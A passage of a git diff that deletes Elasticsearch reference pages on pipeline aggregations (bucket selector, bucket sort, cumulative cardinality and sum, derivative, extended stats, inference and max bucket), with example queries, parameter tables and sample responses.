pipeline aggregations, executes after all other sibling aggregations. This means that -using the bucket_selector aggregation to filter the returned buckets in the response does not save on execution time running the aggregations. - -==== Syntax - -A `bucket_selector` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "bucket_selector": { - "buckets_path": { - "my_var1": "the_sum", <1> - "my_var2": "the_value_count" - }, - "script": "params.my_var1 > params.my_var2" - } -} --------------------------------------------------- -// NOTCONSOLE -<1> Here, `my_var1` is the name of the variable for this buckets path to use in the script, `the_sum` is the path to -the metrics to use for that variable. - -[[bucket-selector-params]] -.`bucket_selector` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`script` |The script to run for this aggregation. The script can be inline, file or indexed. (see <> -for more details) |Required | -|`buckets_path` |A map of script variables and their associated path to the buckets we wish to use for the variable -(see <> for more details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional |`skip` -|=== - -The following snippet only retains buckets where the total sales for the month is more than 200: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "total_sales": { - "sum": { - "field": "price" - } - }, - "sales_bucket_filter": { - "bucket_selector": { - "buckets_path": { - "totalSales": "total_sales" - }, - "script": "params.totalSales > 200" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "total_sales": { - "value": 550.0 - } - },<1> - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "total_sales": { - "value": 375.0 - }, - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> Bucket for `2015/02/01 00:00:00` has been removed as its total sales was less than 200 diff --git a/docs/reference/aggregations/pipeline/bucket-sort-aggregation.asciidoc b/docs/reference/aggregations/pipeline/bucket-sort-aggregation.asciidoc deleted file mode 100644 index 69eef2e85b5..00000000000 --- a/docs/reference/aggregations/pipeline/bucket-sort-aggregation.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[search-aggregations-pipeline-bucket-sort-aggregation]] -=== Bucket sort aggregation -++++ -Bucket sort -++++ - -A parent pipeline aggregation which sorts the buckets of its parent multi-bucket aggregation. -Zero or more sort fields may be specified together with the corresponding sort order. -Each bucket may be sorted based on its `_key`, `_count` or its sub-aggregations. -In addition, parameters `from` and `size` may be set in order to truncate the result buckets. - -NOTE: The `bucket_sort` aggregation, like all pipeline aggregations, is executed after all other non-pipeline aggregations. -This means the sorting only applies to whatever buckets are already returned from the parent aggregation. For example, -if the parent aggregation is `terms` and its `size` is set to `10`, the `bucket_sort` will only sort over those 10 -returned term buckets. - -==== Syntax - -A `bucket_sort` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "bucket_sort": { - "sort": [ - { "sort_field_1": { "order": "asc" } }, <1> - { "sort_field_2": { "order": "desc" } }, - "sort_field_3" - ], - "from": 1, - "size": 3 - } -} --------------------------------------------------- -// NOTCONSOLE -<1> Here, `sort_field_1` is the bucket path to the variable to be used as the primary sort and its order -is ascending. - -[[bucket-sort-params]] -.`bucket_sort` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`sort` |The list of fields to sort on. See <> for more details. |Optional | -|`from` |Buckets in positions prior to the set value will be truncated. |Optional | `0` -|`size` |The number of buckets to return. Defaults to all buckets of the parent aggregation. |Optional | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional |`skip` -|=== - -The following snippet returns the buckets corresponding to the 3 months with the highest total sales in descending order: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "total_sales": { - "sum": { - "field": "price" - } - }, - "sales_bucket_sort": { - "bucket_sort": { - "sort": [ - { "total_sales": { "order": "desc" } } <1> - ], - "size": 3 <2> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `sort` is set to use the values of `total_sales` in descending order -<2> `size` is set to `3` meaning only the top 3 months in `total_sales` will be returned - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 82, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "total_sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "total_sales": { - "value": 375.0 - }, - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "total_sales": { - "value": 60.0 - }, - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 82/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -==== Truncating without sorting - -It is also possible to use this aggregation in order to truncate the result buckets -without doing any sorting. To do so, just use the `from` and/or `size` parameters -without specifying `sort`. - -The following example simply truncates the result so that only the second bucket is returned: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "bucket_truncate": { - "bucket_sort": { - "from": 1, - "size": 1 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/cumulative-cardinality-aggregation.asciidoc b/docs/reference/aggregations/pipeline/cumulative-cardinality-aggregation.asciidoc deleted file mode 100644 index 70f907b7cda..00000000000 --- a/docs/reference/aggregations/pipeline/cumulative-cardinality-aggregation.asciidoc +++ /dev/null @@ -1,236 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-pipeline-cumulative-cardinality-aggregation]] -=== Cumulative cardinality aggregation -++++ -Cumulative cardinality -++++ - -A parent pipeline aggregation which calculates the Cumulative Cardinality in a parent histogram (or date_histogram) -aggregation. The specified metric must be a cardinality aggregation and the enclosing histogram -must have `min_doc_count` set to `0` (default for `histogram` aggregations). - -The `cumulative_cardinality` agg is useful for finding "total new items", like the number of new visitors to your -website each day. A regular cardinality aggregation will tell you how many unique visitors came each day, but doesn't -differentiate between "new" or "repeat" visitors. The Cumulative Cardinality aggregation can be used to determine -how many of each day's unique visitors are "new". - -==== Syntax - -A `cumulative_cardinality` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "cumulative_cardinality": { - "buckets_path": "my_cardinality_agg" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[cumulative-cardinality-params]] -.`cumulative_cardinality` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the cardinality aggregation we wish to find the cumulative cardinality for (see <> for more - details) |Required | -|`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the cumulative cardinality of the total daily `users`: - -[source,console] --------------------------------------------------- -GET /user_hits/_search -{ - "size": 0, - "aggs": { - "users_per_day": { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "day" - }, - "aggs": { - "distinct_users": { - "cardinality": { - "field": "user_id" - } - }, - "total_new_users": { - "cumulative_cardinality": { - "buckets_path": "distinct_users" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:user_hits] - -<1> `buckets_path` instructs this aggregation to use the output of the `distinct_users` aggregation for the cumulative cardinality - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "users_per_day": { - "buckets": [ - { - "key_as_string": "2019-01-01T00:00:00.000Z", - "key": 1546300800000, - "doc_count": 2, - "distinct_users": { - "value": 2 - }, - "total_new_users": { - "value": 2 - } - }, - { - "key_as_string": "2019-01-02T00:00:00.000Z", - "key": 1546387200000, - "doc_count": 2, - "distinct_users": { - "value": 2 - }, - "total_new_users": { - "value": 3 - } - }, - { - "key_as_string": "2019-01-03T00:00:00.000Z", - "key": 1546473600000, - "doc_count": 3, - "distinct_users": { - "value": 3 - }, - "total_new_users": { - "value": 4 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - - -Note how the second day, `2019-01-02`, has two distinct users but the `total_new_users` metric generated by the -cumulative pipeline agg only increments to three. This means that only one of the two users that day were -new, the other had already been seen in the previous day. This happens again on the third day, where only -one of three users is completely new. - -==== Incremental cumulative cardinality - -The `cumulative_cardinality` agg will show you the total, distinct count since the beginning of the time period -being queried. Sometimes, however, it is useful to see the "incremental" count. Meaning, how many new users -are added each day, rather than the total cumulative count. - -This can be accomplished by adding a `derivative` aggregation to our query: - -[source,console] --------------------------------------------------- -GET /user_hits/_search -{ - "size": 0, - "aggs": { - "users_per_day": { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "day" - }, - "aggs": { - "distinct_users": { - "cardinality": { - "field": "user_id" - } - }, - "total_new_users": { - "cumulative_cardinality": { - "buckets_path": "distinct_users" - } - }, - "incremental_new_users": { - "derivative": { - "buckets_path": "total_new_users" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:user_hits] - - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "users_per_day": { - "buckets": [ - { - "key_as_string": "2019-01-01T00:00:00.000Z", - "key": 1546300800000, - "doc_count": 2, - "distinct_users": { - "value": 2 - }, - "total_new_users": { - "value": 2 - } - }, - { - "key_as_string": "2019-01-02T00:00:00.000Z", - "key": 1546387200000, - "doc_count": 2, - "distinct_users": { - "value": 2 - }, - "total_new_users": { - "value": 3 - }, - "incremental_new_users": { - "value": 1.0 - } - }, - { - "key_as_string": "2019-01-03T00:00:00.000Z", - "key": 1546473600000, - "doc_count": 3, - "distinct_users": { - "value": 3 - }, - "total_new_users": { - "value": 4 - }, - "incremental_new_users": { - "value": 1.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/cumulative-sum-aggregation.asciidoc b/docs/reference/aggregations/pipeline/cumulative-sum-aggregation.asciidoc deleted file mode 100644 index 9d4bd340320..00000000000 --- a/docs/reference/aggregations/pipeline/cumulative-sum-aggregation.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[[search-aggregations-pipeline-cumulative-sum-aggregation]] -=== Cumulative sum aggregation -++++ -Cumulative sum -++++ - -A parent pipeline aggregation which calculates the cumulative sum of a specified metric in a parent histogram (or date_histogram) -aggregation. The specified metric must be numeric and the enclosing histogram must have `min_doc_count` set to `0` (default -for `histogram` aggregations). - -==== Syntax - -A `cumulative_sum` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "cumulative_sum": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[cumulative-sum-params]] -.`cumulative_sum` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the cumulative sum for (see <> for more - details) |Required | -|`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the cumulative sum of the total monthly `sales`: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - }, - "cumulative_sales": { - "cumulative_sum": { - "buckets_path": "sales" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this cumulative sum aggregation to use the output of the `sales` aggregation for the cumulative sum - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - }, - "cumulative_sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - }, - "cumulative_sales": { - "value": 610.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - }, - "cumulative_sales": { - "value": 985.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/derivative-aggregation.asciidoc b/docs/reference/aggregations/pipeline/derivative-aggregation.asciidoc deleted file mode 100644 index 92ea053f01a..00000000000 --- a/docs/reference/aggregations/pipeline/derivative-aggregation.asciidoc +++ /dev/null @@ -1,317 +0,0 @@ -[[search-aggregations-pipeline-derivative-aggregation]] -=== Derivative aggregation -++++ -Derivative -++++ - -A parent pipeline aggregation which calculates the derivative of a specified metric in a parent histogram (or date_histogram) -aggregation. The specified metric must be numeric and the enclosing histogram must have `min_doc_count` set to `0` (default -for `histogram` aggregations). - -==== Syntax - -A `derivative` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -"derivative": { - "buckets_path": "the_sum" -} --------------------------------------------------- -// NOTCONSOLE - -[[derivative-params]] -.`derivative` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the derivative for (see <> for more - details) |Required | - |`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional |`skip` - |`format` |format to apply to the output value of this aggregation |Optional | `null` -|=== - - -==== First Order Derivative - -The following snippet calculates the derivative of the total monthly `sales`: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - }, - "sales_deriv": { - "derivative": { - "buckets_path": "sales" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this derivative aggregation to use the output of the `sales` aggregation for the derivative - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } <1> - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - }, - "sales_deriv": { - "value": -490.0 <2> - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, <3> - "sales": { - "value": 375.0 - }, - "sales_deriv": { - "value": 315.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> No derivative for the first bucket since we need at least 2 data points to calculate the derivative -<2> Derivative value units are implicitly defined by the `sales` aggregation and the parent histogram so in this case the units -would be $/month assuming the `price` field has units of $. -<3> The number of documents in the bucket are represented by the `doc_count` - -==== Second Order Derivative - -A second order derivative can be calculated by chaining the derivative pipeline aggregation onto the result of another derivative -pipeline aggregation as in the following example which will calculate both the first and the second order derivative of the total -monthly sales: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - }, - "sales_deriv": { - "derivative": { - "buckets_path": "sales" - } - }, - "sales_2nd_deriv": { - "derivative": { - "buckets_path": "sales_deriv" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` for the second derivative points to the name of the first derivative - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 50, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } <1> - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - }, - "sales_deriv": { - "value": -490.0 - } <1> - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - }, - "sales_deriv": { - "value": 315.0 - }, - "sales_2nd_deriv": { - "value": 805.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 50/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> No second derivative for the first two buckets since we need at least 2 data points from the first derivative to calculate the -second derivative - -==== Units - -The derivative aggregation allows the units of the derivative values to be specified. This returns an extra field in the response -`normalized_value` which reports the derivative value in the desired x-axis units. In the below example we calculate the derivative -of the total sales per month but ask for the derivative of the sales as in the units of sales per day: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - }, - "sales_deriv": { - "derivative": { - "buckets_path": "sales", - "unit": "day" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -<1> `unit` specifies what unit to use for the x-axis of the derivative calculation - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 50, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } <1> - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - }, - "sales_deriv": { - "value": -490.0, <1> - "normalized_value": -15.806451612903226 <2> - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - }, - "sales_deriv": { - "value": 315.0, - "normalized_value": 11.25 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 50/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> `value` is reported in the original units of 'per month' -<2> `normalized_value` is reported in the desired units of 'per day' diff --git a/docs/reference/aggregations/pipeline/extended-stats-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/extended-stats-bucket-aggregation.asciidoc deleted file mode 100644 index a1d0674c803..00000000000 --- a/docs/reference/aggregations/pipeline/extended-stats-bucket-aggregation.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[[search-aggregations-pipeline-extended-stats-bucket-aggregation]] -=== Extended stats bucket aggregation -++++ -Extended stats bucket -++++ - -A sibling pipeline aggregation which calculates a variety of stats across all bucket of a specified metric in a sibling aggregation. -The specified metric must be numeric and the sibling aggregation must be a multi-bucket aggregation. - -This aggregation provides a few more statistics (sum of squares, standard deviation, etc) compared to the `stats_bucket` aggregation. - -==== Syntax - -A `extended_stats_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "extended_stats_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[extended-stats-bucket-params]] -.`extended_stats_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to calculate stats for (see <> for more - details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` -|`format` |format to apply to the output value of this aggregation |Optional | `null` -|`sigma` |The number of standard deviations above/below the mean to display |Optional | 2 -|=== - -The following snippet calculates the extended stats for monthly `sales` bucket: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "stats_monthly_sales": { - "extended_stats_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `bucket_paths` instructs this `extended_stats_bucket` aggregation that we want the calculate stats for the `sales` aggregation in the -`sales_per_month` date histogram. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "stats_monthly_sales": { - "count": 3, - "min": 60.0, - "max": 550.0, - "avg": 328.3333333333333, - "sum": 985.0, - "sum_of_squares": 446725.0, - "variance": 41105.55555555556, - "variance_population": 41105.55555555556, - "variance_sampling": 61658.33333333334, - "std_deviation": 202.74505063146563, - "std_deviation_population": 202.74505063146563, - "std_deviation_sampling": 248.3109609609156, - "std_deviation_bounds": { - "upper": 733.8234345962646, - "lower": -77.15676792959795, - "upper_population" : 733.8234345962646, - "lower_population" : -77.15676792959795, - "upper_sampling" : 824.9552552551645, - "lower_sampling" : -168.28858858849787 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/inference-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/inference-bucket-aggregation.asciidoc deleted file mode 100644 index 808bd5ddbd7..00000000000 --- a/docs/reference/aggregations/pipeline/inference-bucket-aggregation.asciidoc +++ /dev/null @@ -1,185 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-pipeline-inference-bucket-aggregation]] -=== {infer-cap} bucket aggregation -++++ -{infer-cap} bucket -++++ - -experimental::[] - -A parent pipeline aggregation which loads a pre-trained model and performs -{infer} on the collated result fields from the parent bucket aggregation. - -To use the {infer} bucket aggregation, you need to have the same security -privileges that are required for using the <>. - -[[inference-bucket-agg-syntax]] -==== Syntax - -A `inference` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "inference": { - "model_id": "a_model_for_inference", <1> - "inference_config": { <2> - "regression_config": { - "num_top_feature_importance_values": 2 - } - }, - "buckets_path": { - "avg_cost": "avg_agg", <3> - "max_cost": "max_agg" - } - } -} --------------------------------------------------- -// NOTCONSOLE -<1> The ID of model to use. -<2> The optional inference config which overrides the model's default settings -<3> Map the value of `avg_agg` to the model's input field `avg_cost` - - -[[inference-bucket-params]] -.`inference` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -| `model_id` | The ID of the model to load and infer against | Required | - -| `inference_config` | Contains the inference type and its options. There are two types: <> and <> | Optional | - -| `buckets_path` | Defines the paths to the input aggregations and maps the aggregation names to the field names expected by the model. -See <> for more details | Required | - -|=== - - -==== Configuration options for {infer} models - -The `inference_config` setting is optional and usually isn't required as the -pre-trained models come equipped with sensible defaults. In the context of -aggregations some options can be overridden for each of the two types of model. - -[discrete] -[[inference-agg-regression-opt]] -===== Configuration options for {regression} models - -`num_top_feature_importance_values`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-regression-num-top-feature-importance-values] - -[discrete] -[[inference-agg-classification-opt]] -===== Configuration options for {classification} models - -`num_top_classes`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-classes] - -`num_top_feature_importance_values`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-feature-importance-values] - -`prediction_field_type`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-prediction-field-type] - - -[[inference-bucket-agg-example]] -==== Example - -The following snippet aggregates a web log by `client_ip` and extracts a number -of features via metric and bucket sub-aggregations as input to the {infer} -aggregation configured with a model trained to identify suspicious client IPs: - -[source,console] -------------------------------------------------- -GET kibana_sample_data_logs/_search -{ - "size": 0, - "aggs": { - "client_ip": { <1> - "composite": { - "sources": [ - { - "client_ip": { - "terms": { - "field": "clientip" - } - } - } - ] - }, - "aggs": { <2> - "url_dc": { - "cardinality": { - "field": "url.keyword" - } - }, - "bytes_sum": { - "sum": { - "field": "bytes" - } - }, - "geo_src_dc": { - "cardinality": { - "field": "geo.src" - } - }, - "geo_dest_dc": { - "cardinality": { - "field": "geo.dest" - } - }, - "responses_total": { - "value_count": { - "field": "timestamp" - } - }, - "success": { - "filter": { - "term": { - "response": "200" - } - } - }, - "error404": { - "filter": { - "term": { - "response": "404" - } - } - }, - "error503": { - "filter": { - "term": { - "response": "503" - } - } - }, - "malicious_client_ip": { <3> - "inference": { - "model_id": "malicious_clients_model", - "buckets_path": { - "response_count": "responses_total", - "url_dc": "url_dc", - "bytes_sum": "bytes_sum", - "geo_src_dc": "geo_src_dc", - "geo_dest_dc": "geo_dest_dc", - "success": "success._count", - "error404": "error404._count", - "error503": "error503._count" - } - } - } - } - } - } -} -------------------------------------------------- -// TEST[skip:setup kibana sample data] - -<1> A composite bucket aggregation that aggregates the data by `client_ip`. -<2> A series of metrics and bucket sub-aggregations. -<3> {infer-cap} bucket aggregation that contains the model ID and maps the -aggregation names to the model's input fields. diff --git a/docs/reference/aggregations/pipeline/max-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/max-bucket-aggregation.asciidoc deleted file mode 100644 index bb01bb28f2b..00000000000 --- a/docs/reference/aggregations/pipeline/max-bucket-aggregation.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[[search-aggregations-pipeline-max-bucket-aggregation]] -=== Max bucket aggregation -++++ -Max bucket -++++ - -A sibling pipeline aggregation which identifies the bucket(s) with the maximum value of a specified metric in a sibling aggregation -and outputs both the value and the key(s) of the bucket(s). The specified metric must be numeric and the sibling aggregation must -be a multi-bucket aggregation. - -==== Syntax - -A `max_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "max_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[max-bucket-params]] -.`max_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the maximum for (see <> for more - details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` - |`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the maximum of the total monthly `sales`: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "max_monthly_sales": { - "max_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this max_bucket aggregation that we want the maximum value of the `sales` aggregation in the -`sales_per_month` date histogram. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "max_monthly_sales": { - "keys": ["2015/01/01 00:00:00"], <1> - "value": 550.0 - } - } -} --------------------------------------------------- -// 